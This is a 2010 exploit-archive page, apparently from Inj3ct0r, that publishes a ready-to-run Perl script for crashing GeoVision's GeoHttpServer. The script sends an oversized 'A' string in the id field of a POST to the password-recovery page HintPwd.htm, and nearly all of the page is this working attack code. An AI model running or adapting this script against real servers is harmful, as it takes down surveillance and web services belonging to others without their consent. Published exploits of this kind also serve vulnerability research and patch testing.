Home / os / win7

GeoHttpServer Remote DoS Vulnerability

Posted on 08 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GeoHttpServer Remote DoS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================
GeoHttpServer Remote DoS Vulnerability
======================================

#!/usr/bin/perl
 
# Exploit Title: GeoHttpServer remote DoS
# Date: 7-5-2010
# Author: aviho1
# vendor: GeoVision
# Version: all
#info: the password recovery page does not properly validate user-supplied
password ,causing a dos.
use IO::Socket;
 
my $host = shift || 'localhost'; # Target host
my $port = shift || 80;
 
my $req = &quot;POST /HintPwd.htm HTTP/1.1
&quot;;
$req .= &quot;Host: $host:$port
&quot;;
$req .= &quot;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he;
rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)
&quot;;
$req .= &quot;Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
&quot;;
$req .= &quot;Accept-Language: he,en-US;q=0.7,en;q=0.3
&quot;;
$req .= &quot;Accept-Encoding: gzip,deflate
&quot;;
$req .= &quot;Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
&quot;;
$req .= &quot;Keep-Alive: 300
&quot;;
$req .= &quot;Connection: keep-alive
&quot;;
$req .= &quot;Referer: http://$host/
&quot;;
$req .= &quot;Content-Type: application/x-www-form-urlencoded
&quot;;
$req .= &quot;Content-Length: 309

&quot;;
$req .=  &quot;id=&quot; . &quot;A&quot; x 300 . &quot;&amp;OK=OK&quot;;
print &quot;
Connecting to $host on port $port
&quot;;
 
my $sock = new IO::Socket::INET( PeerAddr =&gt; $host, PeerPort =&gt; $port, Proto
=&gt; 'tcp');
$sock or die &quot;Cannot connect to server: $!&quot;;
print &quot;Sending HTTP request..
&quot;;
print $sock $req;
print &quot;Exploited. Target should be DoSed
&quot;;
 
close $sock;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :